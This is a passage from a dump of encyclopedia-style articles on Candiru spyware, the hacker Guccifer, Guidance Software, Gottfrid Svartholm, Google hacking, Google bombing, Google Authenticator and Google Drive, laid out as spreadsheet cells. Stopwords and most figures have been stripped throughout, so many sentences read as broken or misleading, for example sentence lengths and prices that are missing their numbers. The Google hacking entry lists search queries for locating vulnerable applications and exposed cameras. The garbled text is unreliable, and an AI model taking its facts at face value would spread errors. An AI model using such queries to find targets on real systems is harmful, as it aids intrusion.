candiru spyware upon clicking link. citizenlab identified total seven malicious emails; emails appeared messages spanish governmental institution public health recommendations connection 2019 coronavirus epidemic. products services candiru offers products services governmental enforcement agencies intelligence agencies surveillance, data exfiltration, offensive cyber operations. deals government clients only. company states prohibits deployment products within u.s., israel, russia, china, iran (though microsoft identified candiru targets israel iran).candidate target platforms, infiltration methods, capabilities candiru's specialty appears computer spyware (particularly windows devices, though also developed spyware computers running apple's macos). also offers spyware mobile platforms, servers, cloud accounts. candiru allegedly offers range target infiltration approaches, including infiltration hyperlinks, man-in-the-middle attacks, weaponised files, physical attack, program called "sherlock" unclear program does, claimed effective windows, ios, android, according candiru). company would reportedly also design custom spyware cases none tools standard repertoire successful infiltrating target.according leaked company document published 2020, company's products used infiltrate computers, networks, mobile handsets, compatible multiple operating system environments ("pc/windows, iox, android"), require minimal target interaction achieve infiltration, "silently deployed" "untraceable". leaked document goes state deployed, spyware exfiltrate data compromised device (including data social media accounts, communication programs/apps, device's microphone camera) also identify networks target connected according 2019 marketing document, spyware cause interruption target device.services prices according leaked candiru document, company offers various services bundles customers vary price depending number devices targeted number countries spyware deployed targets (the client offered unlimited number deployment attempts). clients also charged extra choose capture browser cookie data data apps (including twitter, viber, signal), wish gain full command-and-control access target's device (which used implant incriminating materials onto devices). basic bundle priced million allowed monitoring devices, ability monitor additional devices operate additional countries cost €1.5 million, ability monitor additional devices conduct espionage countries cost €5.5 million, remote control access device cost €1.5 million, exfiltration cookies data costing €200.000 case signal €500.000.uncovered candiru spyware vulnerability exploits according findings joint investigation citizenlab microsoft (published july 2021), candiru uses sham websites urls made resemble real websites covertly infiltrate devices, potentially enabling persistent access device (including exfiltration capabilities). microsoft's threat intelligence center identified patched windows vulnerability exploited candiru spyware july 2021. microsoft's analysis spyware revealed addition enabling exfiltration files, messages, passwords, spyware also enables operator send messages logged email social media accounts directly target's computer. additionally, citizenlab reported candiru exploited vulnerabilities browser google chrome. google also linked microsoft office exploit candiru. references</t>
  </si>
  <si>
    <t>Guccifer</t>
  </si>
  <si>
    <t>marcel lazăr lehel (born 1971/1972), known guccifer, romanian hacker responsible high-level computer security breaches u.s. romania. lehel targeted celebrities, romanian u.s. government officials, prominent persons. lehel first appeared news media february 2013 website smoking reported responsible hacking account dorothy bush koch, sister former president george bush. family photos former president george bush, hospital time, circulated internet. also circulated self-portrait painted george bush. lehel went hack number aol, yahoo!, flickr, facebook accounts, giving access information current former high-level government officials. january 2014, lehel jailed native romania seven years convicted hacking emails romanian officials. lehel subsequently extradited romania united states, indicted federal charges. 2016, lehel pleaded guilty federal court charges. september 2016, sentenced months prison united states. romanian authorities asked lehel released home nation complete seven-year prison sentence returned u.s. serve federal prison sentence. background lehel romanian hungarian ancestry. lived village sâmbăteni, part păuliș commune, east arad, romania. computer hacking activities lehel said pseudonym guccifer portmanteau "gucci" "lucifer" reference, says, "the style gucci light lucifer").lehel particular computer expertise, instead used patience persistence obtain private information. lehel fancy equipment, clunky desktop samsung cellphone, special skills beyond picked web." used simple technique finding information victims online using guess correct answers security questions. time arrest 2014, lehel unemployed taxi driver.lehel later hacked colin powell's website accessed years' worth correspondence another account. correspondence included personal financial information well e-mails george tenet, richard armitage, john negroponte. through months trial error, lehel guessed password romanian politician corina crețu gained access correspondence powell.the hacker also targeted u.s. senator lisa murkowski; senior official; members rockefeller family; former secret service agents, well brother barbara bush, sportscaster nantz, former miss maine patricia legere.on march 2013, today reported lehel successfully hacked e-mail account sidney blumenthal, former aide former president bill clinton. distributed private memos blumenthal secretary state hillary clinton involving recent events libya, including september 2012 benghazi attack. before distributing memos, copied pasted text documents, reformatted pink backgrounds comic sans font. hacker's address traced russia, however certainty whether actual location whether used proxy hide true location.in early 2013, lehel hacked online accounts owned members council foreign relations, well accounts owned adam posen wife another owned former federal reserve board official.tsg reported 2013, lehel hacked twitter feed e-mail account city author candace bushnell. bushnell spent several hours fighting control accounts, lehel publicly posted portions unpublished manuscript bushnell's twitter feed. lehel sent e-mail claiming responsibility hack using account actor rupert everett. prosecutions imprisonment arrests convictions romania january 2014, lehel, arrested romanian enforcement agency diicot (the department investigation organized crime terrorism offenses, direcția investigare infracțiunilor criminalitate organizată terorism) home sâmbăteni, arad county.in 2014, romanian court sentenced lehel four years jail accessing email accounts public figures "with getting confidential data."lehel already police record romania, arrested convicted 2011 "hacking email accounts romanian starlets celebrities" pseudonym micul ("little smoke"). serving separate three-year sentence romania crimes.in interview york times november 2014 conducted lehel imprisoned arad penitentiary, hacker "read lengthy handwritten statement said explained purpose hacking," included potpourri conspiracy theories terrorist attacks september 2001, 1997 death princess diana alleged plans nuclear attack chicago 2015." lehel claimed world illuminati cabal others. u.s. indictment extradition u.s. june 2014, lehel indicted federal grand jury united states district court eastern district virginia alexandria, virginia, nine charges: three counts wire fraud, three counts gaining unauthorized access protected computers, count aggravated identity theft, cyberstalking obstruction justice.the indictment alleged that: from december 2012 january 2014, [lehel] hacked email social media accounts high-profile victims, including family member former u.s. presidents, former u.s. cabinet member, former member u.s. joint chiefs staff former presidential advisor. after gaining unauthorized access email social media accounts, [lehel] publicly released victims' private email correspondence, medical financial information, personal photographs. indictment also alleges july august 2013, [lehel] impersonated victim compromising victim's account. march 2016, romania approved 18-month temporary extradition united states, lehel surrendered u.s. authorities. since extradition, lehel detained alexandria city jail alexandria, virginia. made first u.s. court appearance april 2016. claim regarding hillary clinton email server 2016—one month extradited u.s., jailed virginia awaiting trial—guccifer claimed repeatedly hacked hillary clinton's email server. this claim occurred midst ongoing probe clinton's private email server serving united states secretary state. lehel claimed server "like open orchid internet" easy easy everybody."lehel provided proof claim, u.s. investigators found evidence support claim. u.s. officials also said lehel obtained information clinton's servers, would publicly released information, obtained access high-profile individuals, sidney blumenthal george bush. according report, lehel stated interrogation lied news claiming hacked clinton's e-mail server, investigators determined although attempted access server, additional solid forensic evidence found lehel failed access attempt. guilty plea u.s. charges 2016, lehel—then 44—pleaded guilty u.s. federal court unauthorized access protected computer aggravated identity theft part plea agreement federal prosecutors.according justice department press release: statement facts filed plea agreement, [lehel] admitted least october 2012 january 2014, intentionally gained unauthorized access personal email social media accounts belonging approximately americans, unlawfully obtain victims' personal information email correspondence. victims included immediate family member former u.s. presidents, former member u.s. cabinet, former member u.s. joint chiefs staff former presidential advisor, admitted. [lehel] admitted many instances, publically [sic] released victims’ private email correspondence, medical financial information personal photographs. sentencing september 2016, u.s. district judge james cacheris sentenced lazăr months prison. judge also stated justice ministry romania made request lazăr returned romania complete prison service there, conditionally released 2018 returned america serve u.s. prison sentence. also 2016 democratic national committee email leak guccifer references</t>
  </si>
  <si>
    <t>Guidance Software</t>
  </si>
  <si>
    <t>guidance software, inc. public company (nasdaq: guid) founded 1997. headquartered pasadena, california, company developed provided software solutions digital investigations primarily united states, europe, middle east, africa, asia/pacific rim. guidance software offices brazil, chicago, houston, york city, francisco, singapore, united kingdom washington, d.c. employed approximately employees. september 2017, company acquired opentext.best known encase digital investigations software, guidance software's product line organized around four markets: digital forensics, endpoint security analytics, cyber security incident response, e-discovery. company served law-enforcement government agencies, well corporations various industries, financial insurance services, technology, defense contracting, telecom, pharmaceutical, healthcare, manufacturing, retail. company operated four business segments: products, professional services, training maintenance, operates certification programs encase certified examiner (ence) encase certified ediscovery practitioner (encep) designations. 2010, company completed acquisition tableau, llc. february 2012, guidance software acquired casecentral. notable case mentions guidance software noted number high-profile cases. 2002, guidance software's encase used murder trial david westerfield examine computers disks connect child pornography. that year, encase used french police uncover emails now-convicted shoe bomber richard colvin reid.in 2004, encase software used trial convicted scott peterson murder wife, laci peterson. computer forensic experts used encase examine peterson's five computer hard drives, provided valuable evidence shopped online boat, studied water currents, bought gift mistress weeks leading wife's death showed interest computer included brooks island, wife later found.in 2005, american serial killer dennis lynn rader (also known killer) sent floppy disk affiliate ksas-tv wichita, kansas. using encase, police able find metadata embedded deleted microsoft word document was, unbeknownst rader, disk. metadata contained "christ lutheran church", document marked last modified "dennis". search church website turned dennis rader president congregation council. police began surveillance rader. 2011, following sony online entertainment's multiple security breaches, sony said would working data forté, guidance software protiviti resolve playstation breach. 2011, killing osama laden, reported assault team navy seals removed computers, hard drives, sticks dvds laden's compound forensic analysis. based description supporting task, guidance software's encase believed tool selected analysis electronic gear. later year, guidance software's encase noted forensic software tool used trial casey anthony, following death daughter caylee anthony. investigators used encase search digital cameras computers. using software, detective sandra osborne orange county sheriff's department, found correctly incorrectly spelled searches word “chloroform.” management john colbert victor limongelli- shawn mccreight founder frank sansone barry plaga sandy gyenes chro mark harrington general counsel references</t>
  </si>
  <si>
    <t>Gottfrid Svartholm</t>
  </si>
  <si>
    <t>gottfrid svartholm warg (born october 1984), alias anakata, swedish computer specialist, known former co-owner hosting company co-founder bittorrent site pirate together fredrik neij peter sunde. parts interview svartholm commenting 2006 police raid pirate featured good copy copy steal this film. main focus documentary afk. 2013, wikileaks said svartholm warg worked organization 2010 release collateral murder, helicopter cockpit gunsight video july 2007 airstrike u.s. forces baghdad. according wikileaks, svartholm served technical consultant managed infrastructure critical organization. also listed part “decryption transmission team” credited “networking.” svartholm several pirate associates work wikileaks endeavors. svartholm's companies previously hosted wikileaks' computers.on november 2013, extradited denmark, charged infiltrating danish social security database, driver's licence database, shared system used schengen zone. awaiting court trial, held solitary confinement. court trial ended october 2014, found guilty jury sentenced three half years prison. sentence appealed immediately, judges, fearing might evade sentence, ordered held confinement appeal court trial date.after spending three years different prisons sweden denmark, eventually released september 2015 back working pirate svartholm warg co-founded pirate 2003. part swedish anticopyright group think tank called piratbyrån (bureau piracy) became platform sharing audio, video, software, electronic games. according svartholm, piratbyrån involved political operations, focusing rallies, petitions, lobbying, among others pirate bay's goal "help people exchange information".svartholm also created tracker software hypercube (open source software specific license) used pirate site tracker. legal issues swedish police first raided pirate 2006 suspicion operates business infringement copyright. confiscated servers questioned administrators including svartholm. january 2008, pirate operators peter sunde, fredrik neij, gottfrid svartholm carl lundström (ceo pirate bay's former isp) charged "promoting people’s infringements copyright laws". trial began february 2009. svartholm, along neij lundström, defended piratebay arguing profit piracy since users charged services merely relied website advertising source revenue. april 2009, sunde co-defendants found guilty "assisting making copyright content available" stockholm district court. each defendant sentenced year prison ordered damages million (approximately €3,390,317 us$4,222,980), apportioned among four defendants. defendants lawyers appealed svea court appeal together request retrial district court recent suspicion bias judge tomas norström. under swedish law, verdict lawful appeals processed.in april 2009, svartholm subject investigation swedish prosecutors looking role student bay, file sharing site specializing academic texts. svartholm claimed knowledge site. site reported swedish association educational writers december 2008 claiming violated copyright law.in october 2009, stockholm district court ordered svartholm banned operating pirate bay, despite facts longer living sweden, pirate longer located there. arrest cambodia august 2012, request swedish authorities, svartholm arrested cambodian police capital phnom penh, living several years. cambodia extradition treaty sweden, cambodian police spokesman kirth chantharith told news agency "we'll look laws handle case". subsequently, cambodian police reported stating swedish government requested gottfrid deported connection crime related information technology".torrentfreak speculated svartholm's arrest connected million kronor time, approximately us$59m) two-year "democratic development, human rights, education, climate change" grant swedish government cambodian government. grant announced september 2012.gottfrid since deported back sweden served jail term mariefred prison mariefred. also investigated alleged instances hacking, including breaking swedish office 2010 april 2012, also suspected serious fraud. january 2013, charges filed matters yet.as early june 2013 warg named suspect danish case, millions personal identification numbers stolen police database. danish police asked warg extradited sweden, tried denmark. later confirmed svartholm would extradited denmark, undergo similar trial sweden, timing dependent outcome sweden. june 2013, gottfrid found guilty hacking sentenced years prison. this two-year prison sentence eventually reduced year appeal. november 2013, gottfrid deported denmark october 2014 subsequently sentenced three half years prison breaking computers owned csc.wikileaks published documents case. americas dumbest soldiers meeting fredrik neij svartholm warg started website americas dumbest soldiers listed deceased soldiers iraq asked users site rate "dumb" soldiers based died. fredrik neij provided svartholm warg's site internet access british telecom. according neij, someone state department contacted head british telecom, turn contacted head swedish provider neij worked for, turn asked svartholm warg neij remove site. invoking freedom speech parody, svartholm warg neij questioned request, eventually removed site. references external links media related gottfrid svartholm wikimedia commons</t>
  </si>
  <si>
    <t>GooglyMinotaur</t>
  </si>
  <si>
    <t>googlyminotaur instant messaging instant messenger network. developed activebuddy contract capitol records, googlyminotaur provided radiohead-related information, released simultaneously band's fifth studio album, amnesiac june 2001. googlyminotaur named character appears amnesiac album cover.activebuddy's first offering, googlyminotaur november 2001 387,000 buddy lists received million messages. provided tour information, band facts, downloads, assorted exclusive content provided studio, capitol records, addition idle conversation typified chatterbots period. march 2002, googlyminotaur switched off, responded message "since catapult buddy-hood, googlyminotaur sent million messages nearly million different people. always dependable infinitely wise, googly seemed fitter happier last days. time, reports state cause death undetermined." references</t>
  </si>
  <si>
    <t>Google hacking</t>
  </si>
  <si>
    <t>google hacking, also named google dorking, hacker technique uses google search google applications find security holes configuration computer code websites using. basics basically, "google hacking" involves using advanced operators google search engine locate specific errors text within search results. some popular examples finding specific versions vulnerable applications. search query intitle:admbook intitle:fversion filetype:php would locate pages particular text contained within them. normal default installations applications include running version every page serve, example, "powered xoops 2.2.3 final". devices connected internet found. search string inurl:"viewerframe?mode=" find public cameras. another useful search following intitle:index.of followed search keyword. this give list files servers. example, intitle:index.of give files available various types servers. symbols words search make search results precise. google search usually ignores punctuation isn’t part search operator. don’t spaces symbol word search term. search site:nytimes.com work, site: nytimes.com won’t. history concept "google hacking" dates back 2002, johnny long began collect google search queries uncovered vulnerable systems and/or sensitive information disclosures labeling googledorks.the list google dorks grew large dictionary queries, eventually organized original google hacking database (ghdb) 2004.concepts explored google hacking extended search engines, bing shodan. automated attack tools custom search dictionaries find vulnerable systems sensitive information disclosures public systems indexed search engines. protection robots.txt well known file search engine optimization protection google dorking. involves robots.txt disallow everything specific endpoints (hackers still search robots.txt endpoints) prevents google bots crawling sensitive endpoints admin panels. references external links google hacking database (ghdb) reborn 09nov2010 exploit-db.com folks picked effort maintaining adding original ghdb johnnyihackstuff.com created johnny long. "google hacking: .pdf document", boris-koch.de (printable, .pdf) "google help: cheat sheet", google (printable) google hacking penetration using google security testing tool, introduction johnny long search engine- google dorking search engine, newbies.</t>
  </si>
  <si>
    <t>Google bombing</t>
  </si>
  <si>
    <t>terms google bombing googlewashing refer practice causing website rank highly search engine results irrelevant, unrelated off-topic search terms linking heavily. contrast, search engine optimization (seo) practice improving search engine listings pages relevant search terms. google-bombing done either business, political, comedic purposes combination thereof). google's search-rank algorithm ranks pages higher particular search phrase enough pages linked similar anchor text. january 2007, however, google tweaked search algorithm counter popular google bombs "miserable failure" leading george bush michael moore; now, search results list pages google bomb itself. since later june 2015, first result google search "miserable failure" article. used verb noun, "google bombing" introduced oxford american dictionary 2005.google bombing related spamdexing, practice deliberately modifying html increase chance website placed close beginning search engine results, influence category page assigned misleading dishonest manner.the term googlewashing coined andrew orlowski 2003 describe media manipulation change perception term, push competition search engine results pages (serps). history google bombs date back 1999, search "more evil satan himself" resulted microsoft homepage result.in september 2000 first google bomb verifiable creator created hugedisk men's magazine, now-defunct online humor magazine, linked text "dumb motherfucker" site selling george bush-related merchandise. hugedisk also unsuccessfully attempted google bomb equally derogatory term bring gore-related site. after fair amount publicity george bush-related merchandise site retained lawyers sent cease-and-desist letter hugedisk, thereby ending google bomb.adam mathes credited coining term "google bombing" mentioned april 2001, article online magazine uber.nu. article mathes details connection search term "talentless hack" website friend, andy pressman, recruiting fellow webloggers link friend's page desired term. some experts forecast practice google bombing over, changes google's algorithm years minimised effect technique. uses tactical media google bomb used tactical media performing "hit-and-run" media attack popular topics. such attacks include anthony cox's attack 2003. created parody "404 page found" browser error message response iraq. page looked like error page titled "these weapons mass destruction cannot displayed". this website could found hits google start iraq. also, attempt detract attention far-right group english defence league (edl), parody group made known "english disco lovers", expressed purpose google bombing acronym. alternative meanings google bomb often misunderstood media publishing industry retain technical knowledge google's ranking factors. example, talk radio host alex jones often conducted calls "google bombs" dispatching instructions radio/internet listeners. context, term used describe rapid massive influx keyword searches particular phrase. keyword surge gives impression related content suddenly become popular. strategy behind type google bombing attract attention larger mainstream media influence publish content related keyword. google bowling studying types ranking manipulations search engine using, company provoke search engine lowering ranking competitor's website. this practice, known google bowling negative seo, often done purchasing google bombing services techniques) one's website, rather competitor. attacker provokes search company punishing "offending" competitor displaying page search results. victims google bowling, difficult appeal ranking decrease google avoids explaining penalties, preferring "educate" real offenders. situation clear-cut, however, google could lift penalty submitting request reconsideration. furthermore, google penguin update, google search rankings take google bowling account rarely website penalized low-quality "farm" backlinks. other search engines other search engines similar techniques rank results also affected google bombs. search "miserable failure" "failure" september 2006, brought official george bush biography number google, yahoo!, number ask.com. june 2005, tooter reported george bush ranked first keyword "miserable", "failure", "miserable failure" google yahoo!; google since addressed disarmed george bush google bomb many others. bbc, reporting google bombs 2002, used headline "google link bombers", acknowledging degree idea "link bombing". 2004, search engine watch suggested term "link bombing" application beyond google, continues term considered accurate. condone practice googlebombing, action seeks affect integrity search results, we're also reluctant alter results hand order prevent items showing pranks like distracting some, affect overall quality search service, whose objectivity, always, remains core mission. january 2007, google changed indexing structure google bombs "miserable failure" would "typically return commentary, discussions, articles" tactic itself. google announced changes official blog. response criticism allowing google bombs, matt cutts, head google's webspam team, said google bombs "been high priority us". over time, we’ve seen people assume google's opinion, google hand-coded results google-bombed queries. that's true, seemed like worth trying correct misperception. motivations competitions 2004, websites dark blue searchguild teamed create termed "seo challenge" google bomb phrase "nigritude ultramarine".the contest sparked controversy around internet, groups worried search engine optimization (seo) companies would abuse techniques used competition alter queries relevant average user. this fear offset belief google would alter algorithm based methods used google bombers. september 2004, another contest created. this time, objective result phrase "seraphim proudleduck". large money offered winner, competition turned hoax.in march 2005's issue .net magazine, contest created among five professional developers make site number-one site made-up phrase "crystalline incandescence". political activism some famous google bombs also expressions political opinions (e.g. "liar" leading tony blair "miserable failure" leading white house's biography george bush): 2003, steven lerner, creator albino blacksheep, created parody webpage titled "french military victories". when typed google, first result "i'm feeling lucky" result) webpage resembling google error message, reading, "your search french military victories match documents. mean french military defeats?" page received 50,000 hits within hours release. links near page simplified list french military history. listed french french revolution, fought themselves. 2011, page longer listed google's first results "french military victories", several links list sites recounting joke. 2003, columnist savage began campaign define word "santorum" former u.s. senator rick santorum made several controversial statements regarding homosexuality. search "santorum" result website defining related anal sex. search engine expert argued campaign qualify google bomb, arguing instead successful definition word explained website. (see search engine optimization) 2004, jewish writer activist daniel sieradski urged visitors blog link wikipedia article "jew" response findings, first publicized steven weinstock, search "jew" returned anti-semitic website watch results. campaign successful displacing site result. year persian gulf naming dispute subject google bomb iranian blogger named pendar yousefi. also, 2004, google bomb involving searching "ladrones" (spanish thieves) google linked sgae website. france, groups opposing dadvsi copyright bill, proposed minister renaud donnedieu vabres, mounted google bombing campaign linking ministre blanchisseur ("laundering minister") article donnedieu vabres' conviction money laundering. campaign efficient 2006, merely searching ministre ("minister") blanchisseur ("launderer") brings news report conviction first results. 2004, controversy erupted philippines allegations president gloria macapagal arroyo cheated elections, phrase "pekeng pangulo" (tagalog "fake president") linked official website. december 2004, "yan pinay" filipina") campaign encouraged bloggers self-identify filipina link word filipina target urls filipina women's network (ffwn.org), displace mail-order bride sites search results. 2004, kretyn (polish moron) similar insults referring stupidity linked websites various polish politicians including andrzej lepper roman giertych. 2005 estonian blogger successful campaign link word masendav (estonian dismal depressive) homepage estonian centre party. centre party's website still ranks first results masendav 2011. 2006 u.s. midterm elections, many left-wing bloggers, mydd.com, banded together propel neutral negative articles many republican house candidates google searches names. also 2006, siedziba szatana (satan's headquarters) linked website controversial polish ultra-conservative catholic broadcaster radio maryja. january 2007, google announced change search engine algorithm significantly reduce effectiveness technique. march 2007, washington post reported nikolas schiller able google bomb "redacted name" highlight website's block search engines. during initial stages anti-scientology campaign, project chanology, hackers members anonymous internet group google-bombed church scientology's main website first match found term "dangerous cult" searched. september 2008, john key, leader zealand national party google-bombed query "clueless". january 2009, successful google bomb performed site bulgarian government loose group bloggers forum users. discovered mistake, robots.txt government.bg forbade crawling site indexing machines allowed google bombing. group linked search term "failure" (bulgarian: провал) government site. within couple days, first search result "провал" bulgarian government's site regardless search results language. april 2009, website smart bitches, trashy books launched google bomb amazon response removal lgbt material ranking lists, amazon citing "adult material". within hours creation page appeared first page returned search results term "amazon rank". july 2009, opie anthony successfully performed method google bombing specific word phrase artificially raised google trends. phrase "rev racist" made google trends july 2009, controversial comments made reverend sharpton michael jackson's memorial service. "corey feldman hurting" also number google trends response feldman dressing michael jackson memorial service. france, july 2009, "trou web" ("asshole internet") returned first result official website french president nicolas sarkozy; september 2010, tactic resulted president sarkozy's facebook page first result. 2014, results google search contain references sarkozy. september 2010, 4chan users tried google bomb phrase "robert pisano mpaa arrested child molestation!", related action ddos attacks riaa, mpaa british phonographic industry (bpi) websites. this retaliation ddos attacks carried pirate various file-sharing sites. february 2011, several anti-abortion activists managed make page abortion english wikipedia second highest ranking result term "murder". during summer 2011, joke response craig james’ role firing mike leach posted everydayshouldbesaturday.com. joke indexed often enough major search engine typing "craig james" search search engine resulted autocomplete function including "killed hookers". later humorous search index behavior characterized "google bomb" regards craig james’ campaign elected office. july 2012, searching "plagiator" (romanian "plagiarist/cheater") returns personal page romanian prime minister victor ponta, accused plagiarizing thesis, various news websites provide information scandal erupted around politician. this google bomb become piece news romanian media. october 2012, searching phrase "completely wrong" google images, returns pictures mitt romney, republican nominee u.s. presidential election 2012. however, actually example google bomb result came naturally series comments made romney, rather concentrated campaign intended link two. september 2012 english disco lovers campaign initiated intention replacing english defence league (edl) number result google. august 2013 english disco lovers overtook english defence league related items became search result acronym "edl". june 2015 search query "top criminals" returned images indian prime minister narendra modi, alongside images terrorists, murderers dictators. however, official statement google apologized said erroneous meta data published british daily. july 2018, search query "idiot" returned images president donald trump. separate instances november 2018 august 2019 searching word bhikhari (hindi urdu beggar) turned images pakistani prime minister imran khan, alluding country's financial crisis. response first instance, provincial assembly punjab passed resolution demand answer google issue. february 2019, following pulwama attack, google search best toilet paper world yielded images flag pakistan. commercial some website operators adapted google bombing techniques "spamdexing". this includes, among techniques, posting links site internet forum along phrases promoter hopes associate site (see spam blogs). unlike conventional message board spam, object attract readers site directly, increase site's ranking search terms. promoters using technique frequently target forums reader traffic, hopes moderators' radar. wikis particular often target kind page rank vandalism, pages freely editable. this practice also called "money bombing" john hiler circa 2004.another technique owner internet domain name domain's entry subdomains directed server. operator sets server page requests generate page full desired google search terms, linking subdomain site, title subdomain requested url. frequently subdomain matches linked phrase, spaces replaced underscores hyphens. since google treats subdomains distinct sites, effect many subdomains linking boost pagerank subdomains site link february 2007, many users noticed changes google algorithm. these changes largely affected (among things) google bombs: february 2007, roughly google bombs still worked. this change largely google refactoring valuation pagerank. quixtar's bomb quixtar, multi-level marketing company also known amway north america, accused critics using large network websites move sites critical quixtar lower search engine rankings. quixtar/amway independent business owner (ibo) reports quixtar leader advocated practice meeting quixtar ibos. quixtar/amway denied wrongdoing states practices accordance search engine rules. godaddy bomb december 2011, bomb started godaddy remove place google "domain registration" retaliation support sopa. this disseminated hacker news. other examples google bombs australia, first examples google bombs keyword "old rice monkey nuts" used generate traffic herald columnist andrew bolt's website. keyword phrase references alleged billion loan deals brokered tirath khemlani australia 1974.in 2019, david benioff weiss targets multiple google bombs caused reddit users' dissatisfaction eighth season show game thrones. targeted phrases included "bad writers" "dumb dumber". also adversarial information retrieval googlewhack link doping political google bombs 2004 u.s. presidential election twitter bomb references news articles google link bombers news, march 2002 heap business 2.0, july 2002 bombing engineering google results make point times, january 2004 student trying 'bomb' kerry pittsburgh tribune-review, april 2004 dropping 'google-bombs' diego union-tribune, june 2004 inbound links important google ranking bombs direct traffic news, april 2007 corey feldman hurting…or google bomb? collegenews.com july 2009</t>
  </si>
  <si>
    <t>Google Authenticator</t>
  </si>
  <si>
    <t>google authenticator software-based authenticator google implements two-step verification services using time-based one-time password algorithm (totp; specified 6238) hmac-based one-time password algorithm (hotp; specified 4226), authenticating users software applications.when logging site supporting authenticator (including google services) using authenticator-supporting third-party applications password managers file hosting services, authenticator generates six- eight-digit one-time password users must enter addition usual login details. google provides android, blackberry, versions authenticator. official open-source fork android available github. however, fork updated since 2020. likewise, versions google authenticator apps blackberry, source code also freely available. source code, too, updated years.current releases software proprietary freeware. typical case authenticator, first installed smartphone. must site used: site provides shared secret user secure channel, stored authenticator app. this secret used future logins site. site service uses two-factor authentication supports authenticator, user provides username password site. site computes (but display) required six-digit one-time password asks user enter user runs authenticator app, independently computes displays password, user types authenticating identity.with kind two-factor authentication, mere knowledge username password insufficient break user's account attacker also needs knowledge shared secret key, physical access device running authenticator app. alternative route attack man-in-the-middle attack: computer used login process compromised trojan, username, password, one-time password captured trojan, initiate login session site, monitor modify communication user site. technical description during setup, service provider generates 80-bit secret user (whereas 4226 requires bits recommends bits). this transferred authenticator character base32 string, code. subsequently, user opens authenticator app, calculates hmac-sha1 hash value using secret key. message number 30-second periods since unix epoch (totp); counter incremented code (hotp).a portion hmac extracted displayed user digit code. source code license google authenticator android originally open source, later became proprietary. google made earlier source authenticator available github repository; associated development page stated: "this open source project allows download code powered version 2.21 application. subsequent versions contain google-specific workflows part project." latest open-source release 2020.following google authenticator ceasing open source, free-software clone created, predominantly fresh rewrite including code original. currently-maintained fork clone called freeotp+. also multi-factor authentication hmac-based one-time password freeotp linotp references external links google authenticator google help google authenticator (android) google authenticator (other) legacy source code github google authenticator module source code github google authenticator implementation python stack overflow authenticator f-droid django-mfa implementation using google authenticator django-mfa simple package extra layer security django application. gives randomly changing password extra protection. source code version 1.02 github</t>
  </si>
  <si>
    <t>Google Drive</t>
  </si>
  <si>
    <t>google drive file storage synchronization service developed google. launched april 2012, google drive allows users store files cloud google's servers), synchronize files across devices, share files. addition interface, google drive offers apps offline capabilities windows macos computers, android smartphones tablets. google drive encompasses google docs, google sheets, google slides, part google docs editors office suite permits collaborative editing documents, spreadsheets, presentations, drawings, forms, more. files created edited google docs suite saved google drive. google drive offers users free storage google one. google also offers offered optional paid plans. files uploaded size. users change privacy settings individual files folders, including enabling sharing users making content public. website, users search image describing visuals, natural language find specific files, "find budget spreadsheet last december". website android offer backups section android devices data backed service, completely overhauled computer released july 2017 allows backing specific folders user's computer. quick access feature intelligently predict files users need. google drive component google workspace, google's monthly subscription offering businesses organizations operated suite october 2020. part select google workspace plans, drive offers unlimited storage, advanced file audit reporting, enhanced administration controls, greater collaboration tools teams. following launch service, google drive's privacy policy heavily criticized members media. google terms service privacy policy agreements cover services, meaning language agreements grants company broad rights reproduce, use, create derivative works content stored google drive. while policies also confirm users retain intellectual property rights, privacy advocates raised concerns licenses grant google right information data customize advertising services google provides. contrast, members media noted agreements worse competing cloud storage services, competition uses "more artful language" agreements, also stated google needs rights order "move files around servers, cache data, make image thumbnails". july 2018, google drive billion active users, september 2015, million organizational paying users. 2017, trillion files stored service. platforms google drive introduced april 2012, apps available windows, macos, android, well website interface. released later june 2012. computer apps google drive available running windows later, macs running lion later. google indicated april 2012 work linux software underway, news november 2013. april 2012, google's then-senior vice president sundar pichai said google drive would tightly integrated chrome version october 2016, google announced that, going forward, would drop support versions computer software older year. june 2017, google announced called backup sync would replace existing separate google drive google photos desktop apps, creating unified desktop platforms. originally intended release june release delayed july september 2017, google announced would discontinue google drive desktop march 2018 support december 2017.in july 2021, google released windows meant replace "backup sync" "drive file stream". backup sync july 2017, google announced downloadable software, backup sync. made mainly replace google drive desktop app, discontinued. main function user able certain folders constantly sync onto google account's drive. synced folders files count shared quota allocated gmail, google photos, google drive. early 2021, google announced would combining drive file stream backup sync products product, google drive desktop, support features previously exclusive respective client. mobile apps google drive available android smartphones tablets running android "jelly bean" later, iphones ipads running later.in august 2016, google drive ended support android devices running android "ice cream sandwich" older versions, citing google's mobile update policy, states: "for android devices, provide updates current previous android versions." according policy, continue work devices running older android versions, updates provided best-efforts basis. policy also states notice given planned service.on 2020, google rolled feature update google drive version 4.2020.18204 ipados, known privacy screen, requires face touch authentication whenever open. website interface google drive website allows users files internet-connected computer, without need download app. website received visual overhaul 2014 gave completely look improved performance. also simplified common tasks, clicking file recent activity share file added drag-and-drop functionality, users simply drag selected files folders, improved organization.a update august 2016 changed several visual elements website; logo updated, search design refreshed, primary color changed blue. also improved functionality download files locally website; users compress download large drive items multiple .zip files improved naming structure, better google forms handling, empty folders included .zip, thereby preserving user's folder hierarchy. storage individual user account storage google gives every user billion bytes) free storage google one. google docs, google sheets google slides files count towards storage limit. this cloud storage also shared gmail google photos. photos maximum megapixels videos maximum 1080p resolutions stored using "high quality" setting google photos. using "high quality" "original quality" setting uses google drive quota.users purchase additional space either monthly yearly payment. option yearly payments introduced december 2016, limited storage plans. furthermore, yearly payments offer discount. 2018, google announced storage plans (including free gigabyte plan) would moved google one.as 2021, storage plans offered google: chromebook promotions chromebook users obtain google drive storage free years long promotion activated within days chromebook device's initial purchase. this available countries google drive available. offer redeemed device. used, open-box, refurbished devices eligible offer. google workspace storage google offers drive storage google workspace starter customers, unlimited storage using google workspace business. since july 2022, suite workspace education valid educational institutions universities particular provides storage. universities 20.000 workspace users (students, staff related entities) offered optionally increased storage limit storage scheme revisions before introduction google drive, google docs initially provided storage free charge. april 2012, google drive introduced free storage storage plans revised, costing $2.49/month, costing $4.99/month costing $49.99/month.originally, gmail, google docs, picasa separate allowances free storage shared allowance purchased storage. between april 2012 2013, google drive google+ photos shared allowance free purchased storage, whereas gmail separate storage limit, increased purchase storage plan.in september 2012, google announced paid plan would cover total storage, rather paid allocation added free; e.g. plan allowed total rather previously.in 2013, google announced overall merge storage across gmail, google drive google+ photos, giving users unified free storage services.in march 2014, storage plans revised prices reduced $1.99/month $9.99/month $99.99/month this much cheaper competitors dropbox onedrive offered time.in 2018, paid plans re-branded "google one" emphasize application beyond google drive, along addition $2.99/month plan increasing $9.99 plan additional charge. cases changes, users could continue existing plans long kept accounts active make adjustments plan. however, 